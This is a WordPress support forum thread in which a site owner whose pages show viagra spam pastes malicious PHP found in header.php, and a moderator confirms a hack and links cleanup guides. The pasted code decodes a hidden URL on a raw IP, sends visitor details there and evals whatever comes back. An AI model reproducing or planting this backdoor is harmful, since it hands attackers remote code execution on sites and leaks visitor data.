WordPress.org

1. soam
   Member
   Posted 7 months ago #

   Im on latest WordPress as always.

   It was all good till date, since 2 years.

   Just today I saw that, few random pages are showing viagra ads in the top of the page .
   That replaced page title, meta data, and then few 20-30 lines with viagra links, etc.

   On searching, I found this on the header.php :

   <?php
   @eval(str_replace(array("\'","\\\\"), array("'","\\"), @file_get_contents(str_replace("{lai}",@urlencode($_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]),str_replace("{ua}",@urlencode($_SERVER['HTTP_USER_AGENT']),str_replace("{ip}",@urlencode($_SERVER['REMOTE_ADDR']),str_replace("{hr}",@urlencode($_SERVER['HTTP_REFERER']),@base64_decode("aHR0cDovLzk1LjE2OC4xNzguMjA3L3p4Y3Zibm0vc3J2MTcyNi9zdGF0dXNTZXJ2ZXJTaWRlLnBocD9saW5rQXNJcz17bGFpfSZ1YT17dWF9JmlwPXtpcH0maHI9e2hyfSZ2ZXI9Mg=="))))))));
   ?>

2. soam
   Member
   Posted 7 months ago #

   I fixed it by removing from header.php , but how can someone place this in my file ?

3. esmi
   Theme Diva & Forum Moderator
   Posted 7 months ago #

   You've been hacked.
   http://codex.wordpress.org/FAQ_My_site_was_hacked
   http://wordpress.org/support/topic/268083#post-1065779
   http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
   http://ottopress.com/2009/hacked-wordpress-backdoors/

   http://sitecheck.sucuri.net/scanner/

4. soam
   Member
   Posted 7 months ago #

   I know.
   I have already changed logins and removed the code.

   Do I need to take any other step ?

5. soam
   Member
   Posted 7 months ago #

   Ok I just scanned the site on Sucuri and its clean.

   Just one thing.

   See screenshot :

   http://d.pr/1mZ2

   What it says about my internal path ?

Reply

You must log in to post.